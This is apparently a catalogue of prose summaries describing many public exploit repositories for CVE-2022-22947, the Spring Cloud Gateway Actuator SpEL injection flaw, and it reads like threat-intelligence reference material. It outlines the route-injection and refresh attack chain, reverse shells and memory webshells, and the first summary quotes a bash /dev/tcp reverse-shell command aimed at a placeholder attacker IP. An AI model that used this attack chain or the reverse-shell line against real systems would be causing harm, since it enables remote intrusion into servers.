Spring Cloud Gateway Actuator Code Injection RCE

This repository contains a Python exploit script (CVE-2022-22947.py) and a README.md. The exploit targets CVE-2022-22947, a remote code execution vulnerability in Spring Cloud Gateway's Actuator endpoint. The script allows the user to execute arbitrary system commands or obtain a reverse shell on a vulnerable server by abusing the /actuator/gateway/routes and /actuator/gateway/refresh endpoints. The exploit works by creating a malicious route filter using SpEL injection, triggering a refresh, and then retrieving the command output. The script supports both direct command execution and reverse shell payloads, with the latter requiring the user to input a shell command (e.g., bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1). The README provides usage instructions and describes the affected product versions. The code is operational and can be used to gain remote code execution on unprotected, vulnerable Spring Cloud Gateway instances.

This repository is a proof-of-concept (PoC) application for demonstrating and verifying CVE-2022-22947, a remote code execution vulnerability in Spring Cloud Gateway. The project is a minimal Spring Boot application configured with a vulnerable version of Spring Cloud Gateway (3.1.0) and exposes all Actuator endpoints, including the gateway management endpoints. The README provides detailed exploitation steps: an attacker can POST a malicious route containing a SpEL expression to the /actuator/gateway/routes/test endpoint, refresh the routes via /actuator/gateway/refresh, and then trigger code execution by accessing /test. The provided payload demonstrates launching the Calculator app on macOS, but arbitrary commands could be executed. The repository structure is typical for a Maven-based Java project, with the main application entry point in VulnerableGatewayApplication.java and configuration in application.yml. This PoC is intended for educational and research purposes only and should not be used in production environments.

This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). The exploit works by injecting a malicious filter into the gateway's routes via the /actuator/gateway/routes endpoint, then refreshing the configuration and retrieving the output of an arbitrary system command provided by the user. The script interacts with three main endpoints: /actuator/gateway/routes/66Sec (for both adding the malicious route and retrieving results) and /actuator/gateway/refresh (to apply the changes). The exploit requires the target to have the actuator endpoints exposed and accessible. The README provides a brief description and screenshots of successful exploitation. The code is operational and allows for arbitrary command execution, making it a practical exploit for this vulnerability.

This repository contains a Python exploit script targeting CVE-2022-22947 in VMware Spring Cloud Gateway. The exploit leverages exposed actuator endpoints to inject a Java memory shell (memshell) into the target application. The script supports two shell types ('spring' and 'netty'), both of which are injected by sending a crafted, base64-encoded payload to the /actuator/gateway/routes/new_route endpoint. After injection, the /actuator/gateway/refresh endpoint is called to activate the new route. The attacker can then execute arbitrary commands on the target via HTTP requests to the injected shell endpoint (e.g., /GYWA?cmd=whoami). The repository consists of a README.md (with usage instructions and references) and the main exploit script (spring_cloud_gateway_memshell.py). The exploit is operational and provides a working web shell if the target is vulnerable and accessible.

This repository provides a proof-of-concept (PoC) exploit for CVE-2022-22947, a critical vulnerability in Spring Cloud Gateway's Actuator API that allows remote code execution via SpEL injection. The repository contains a Dockerfile to build and run a vulnerable Spring Cloud Gateway instance on port 9000. The README.md details the exploitation steps: sending crafted HTTP requests to the Actuator API to add a route containing a malicious SpEL expression, refreshing the gateway to trigger code execution, retrieving the command output, and cleaning up by deleting the route. The exploit demonstrates execution of arbitrary system commands (e.g., 'id') on the target server. The main attack vector is network-based, targeting the exposed Actuator API endpoints. No actual exploit code is present; the PoC relies on HTTP requests and payloads described in the documentation.

This repository contains a single Java class (GMemShell.java) and a brief README. The Java class implements a memory-resident webshell (memshell) designed to be injected into a vulnerable Spring Cloud Gateway application (targeting CVE-2022-22947). The exploit registers a new HTTP POST endpoint at /cmd, which accepts AES-encrypted, base64-encoded Java class payloads. The attacker can upload a payload, which is loaded and executed in memory, allowing for arbitrary code execution. The code includes cryptographic routines for AES encryption/decryption and base64 encoding/decoding, as well as dynamic class loading via reflection. The README references a blog post describing the injection technique. The exploit is operational and provides a stealthy, in-memory webshell for post-exploitation on vulnerable Java/Spring Cloud Gateway targets.

This repository provides a proof-of-concept exploit for CVE-2022-22947, a code injection vulnerability in VMware's Spring Cloud Gateway. The exploit consists of a single 'Payload' file that outlines a three-step attack: (1) sending a crafted POST request to the /actuator/gateway/routes endpoint to inject a malicious SpEL expression that executes the 'id' command, (2) refreshing the gateway configuration via the /actuator/gateway/refresh endpoint, and (3) retrieving the command output by querying the injected route. The exploit leverages exposed actuator endpoints to achieve remote code execution. The repository also includes a brief README identifying the vulnerability. No framework is used; the exploit is a standalone POC using raw HTTP requests.

This repository provides a Python exploit script (spring-cloud-gateway-rce.py) targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit abuses the Actuator API's /actuator/gateway/routes and /actuator/gateway/refresh endpoints to inject a malicious route containing a SpEL (Spring Expression Language) expression. This expression executes arbitrary system commands on the target server using java.lang.Runtime.exec. The script supports both Linux and Windows targets, allows the attacker to specify arbitrary commands, and can be used to spawn a reverse shell. The README provides usage instructions and examples. The exploit is operational and can be used to gain remote code execution on vulnerable Spring Cloud Gateway instances with exposed Actuator endpoints.

This repository contains a Python exploit (exp.py) targeting CVE-2022-22947, a critical vulnerability in VMware Spring Cloud Gateway's Actuator API that allows SpEL expression injection and remote code execution. The exploit automates the process of injecting a Godzilla memory shell (webshell) into the target application by abusing the AddResponseHeader filter and loading a malicious Java class via a Base64-encoded payload. The exploit works by creating a new route with the malicious payload, refreshing the gateway to apply the route, and then triggering the payload to install the webshell at the /gmem endpoint. The README provides a brief description and references for further information and testing environments. The repository structure is simple, with one main exploit script (exp.py) and a README. The exploit requires the target's Actuator endpoints to be accessible and does not clean up after itself, leaving the malicious route in place unless manually removed.

This repository provides an operational exploit for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The main exploit logic is implemented in Go (main.go) and automates the exploitation process by interacting with the vulnerable management endpoints. The exploit works by adding a new route with a malicious SpEL expression that executes arbitrary system commands, refreshing the gateway to apply the route, retrieving the command output, and then cleaning up by deleting the route and refreshing again. The tool supports both single-target and batch exploitation (via url.txt). The README provides detailed usage instructions and describes the HTTP requests involved. The exploit targets Spring Cloud Gateway instances with exposed /actuator/gateway/routes and /actuator/gateway/refresh endpoints, and is capable of executing arbitrary commands on the target server.

This repository provides an operational exploit for a remote code execution (RCE) vulnerability in Spring Cloud Gateway's actuator endpoints. The main exploit script, 'gateway_rce.py', is written in Python and automates the process of exploiting the vulnerability by creating a malicious route via the '/actuator/gateway/routes' endpoint, which injects a payload for command execution. The script supports several functions: vulnerability detection (by executing 'whoami'), arbitrary command execution, reverse shell via bash and /dev/tcp, outbound network connectivity testing (using www.baidu.com), and uploading/executing a Java-based reverse shell (shell.java). The Java file 'shell.java' is a cross-platform reverse shell that connects back to a specified IP and port, providing an interactive shell to the attacker. The exploit is interactive, requiring the user to input the target URL and select actions. The README provides detailed usage instructions and screenshots. The exploit is not part of a known framework and is intended for manual exploitation of vulnerable Spring Cloud Gateway instances.

This repository provides a working exploit for CVE-2022-22947, a critical remote code execution vulnerability in VMware's Spring Cloud Gateway (versions <3.0.7 and <3.1.1) when the Actuator endpoint is enabled and exposed. The exploit is implemented in Python (exploit.py) and leverages a SpEL (Spring Expression Language) injection via the /actuator/gateway/routes API. The script allows an attacker to execute arbitrary system commands on the target server and retrieve their output. The workflow involves deploying a malicious route, refreshing the gateway, retrieving the command output, and cleaning up by removing the route. The repository includes a README.md with usage instructions and references, the main exploit script (exploit.py), and a requirements.txt for dependencies. The attack vector is network-based, targeting HTTP endpoints exposed by the vulnerable application.

This repository contains a POC/EXP Python script for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway (versions < 3.1.1 and < 3.0.7). The exploit is implemented as a pocsuite3 module, leveraging the framework's API for exploitation. The main script, 'CVE-2022-22947_POC_EXP.py', defines a class that crafts HTTP requests to the vulnerable actuator endpoints of Spring Cloud Gateway. The exploit works by creating a new route with a malicious filter that executes arbitrary system commands via Java's Runtime.exec, then refreshes the gateway, retrieves the command output, and finally deletes the malicious route. The script supports customizable payloads, including reverse shells (nc, bash, powershell). The README provides usage instructions for both verification and exploitation modes. The exploit is operational and can be used to achieve remote code execution on vulnerable targets, provided the actuator endpoints are exposed and accessible.

This repository is a Go-based exploit tool targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit injects a Godzilla memory shell (webshell) into the target application by abusing the /actuator/gateway/routes endpoint. The main functionality is implemented in 'main.go', which parses command-line arguments for the target URL (-u) and an optional proxy (-p). The tool crafts a malicious payload containing a Base64-encoded Java class for the Godzilla memory shell and sends it to the vulnerable endpoint. If successful, it provides persistent remote access to the attacker. The repository is structured simply, with a single Go source file, Go module files, and a README describing usage. The exploit is operational, providing a working payload and proxy support for real-world attacks.

This repository is a proof-of-concept and exploitation toolkit for CVE-2022-22947, a critical remote code execution vulnerability in Spring Cloud Gateway. The exploit leverages the ability to register new routes via the /actuator/gateway/routes/{id} endpoint, injecting a malicious SpEL (Spring Expression Language) payload in the filter configuration. When the /actuator/gateway/refresh endpoint is called, the SpEL is evaluated, leading to arbitrary code execution. The repository includes: - A detailed README.md explaining the vulnerability, affected versions, exploitation steps, and mitigation. - Java source files for two types of memory shells: NettyMemShell (injects a Netty handler for command execution via HTTP headers) and SpringRequestMappingMemshell (registers a new request mapping for command execution). - Example payloads and base64-encoded class files for memory shells. - A sample Spring Boot application configured to demonstrate the vulnerability. The exploit requires the target to have the 'gateway' actuator endpoint enabled and exposed. The attacker can then use HTTP POST requests to inject and trigger the payload. The provided memory shells allow persistent access and command execution via HTTP requests. The repository is operational and can be used to demonstrate or further develop exploits for this vulnerability.

This repository contains a single Python exploit script (exp.py) and a README. The exploit targets CVE-2022-22947, a vulnerability in Spring Cloud Gateway that allows unauthenticated remote code execution via the /actuator/gateway/routes API. The script supports injecting three types of memory shells (webshells): Spring, Netty, and Godzilla (哥斯拉). The user specifies the shell type and the target URL. The script crafts a JSON payload containing a base64-encoded Java class for the chosen shell, sends it to the vulnerable endpoint, refreshes the gateway, and provides instructions for accessing the shell. The README provides usage instructions and references. The exploit is operational and provides persistent remote access if successful. No hardcoded IPs or domains are present; the target is specified by the user at runtime.

This repository provides a working exploit for CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway (versions <3.1.1 and <3.0.7) when the Actuator API is exposed. The exploit consists of a Python script ('spring_cloud_RCE.py') that automates the attack steps: it sends crafted HTTP requests to the Actuator endpoints to add a malicious route containing a SpEL payload, triggers a refresh to apply the route, retrieves the result of the executed command (default: 'id'), and finally deletes the route to clean up. The exploit leverages the ability to inject SpEL expressions via the Actuator API, resulting in arbitrary command execution on the target server. The repository also includes detailed markdown documentation in both Chinese and English, describing the vulnerability, affected versions, mitigation steps, and manual exploitation steps. The main attack vector is network-based, targeting HTTP endpoints exposed by the vulnerable Spring Cloud Gateway instance.

This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947). The exploit works by sending crafted HTTP POST requests to the /actuator/gateway/routes and /actuator/gateway/refresh endpoints of a vulnerable Spring Cloud Gateway instance. It injects a malicious filter that executes arbitrary system commands (by default, 'id') and retrieves the output via a custom HTTP response header. The script supports targeting single or multiple URLs and can use a proxy. The repository also includes a README.md with vulnerability details and mitigation advice, and a requirements.txt listing Python dependencies. The main attack vector is network-based, requiring access to the vulnerable actuator endpoints. The exploit is operational, providing real command execution on the target if successful.

This repository contains a Python exploit script (CVE-2022-22947.py) targeting the Spring Cloud Gateway vulnerability CVE-2022-22947. The exploit leverages exposed actuator endpoints to inject a malicious route filter, enabling remote command execution or a reverse shell on the target server. The script provides two main functionalities: executing arbitrary commands and establishing a reverse shell to an attacker-controlled host. The exploit works by sending crafted JSON payloads to the /actuator/gateway/routes and /actuator/gateway/refresh endpoints, then retrieving the command output. The README provides usage instructions for both command execution and reverse shell. The repository is straightforward, with one main exploit script and a brief README, and is operational with hardcoded payloads for exploitation.

This repository provides an operational exploit for CVE-2022-22947, a remote code execution vulnerability in VMWare Spring Cloud Gateway. The exploit is implemented in Python (cve-2022-22947.py) and allows an attacker to execute arbitrary system commands on vulnerable Spring Cloud Gateway instances by abusing the /actuator/gateway/routes and /actuator/gateway/refresh endpoints. The script supports both single and batch target modes, as well as reverse shell payloads. The exploit works by creating a malicious route with a filter that executes a base64-encoded command via Java's Runtime.exec, refreshing the routes, and then retrieving the command output. The repository also includes a README with detailed usage instructions and a sample url.txt file for batch testing. The main attack vector is network-based, targeting exposed HTTP endpoints. The exploit is operational, providing real command execution and output retrieval, and is not just a proof of concept.

This repository contains a Python exploit script (CVE-2022-22947.py) targeting CVE-2022-22947, a remote code execution vulnerability in VMware Spring Cloud Gateway. The exploit works by abusing the actuator API endpoints to create a new route with a malicious filter that executes arbitrary system commands. The command output is returned in a custom HTTP response header ('Result'). The script automates the process of creating the route, triggering the command, retrieving the output, and cleaning up by deleting the route. The only other file is a README.md with basic usage instructions. The exploit requires the target's actuator endpoints to be accessible and is capable of executing arbitrary commands on the target server.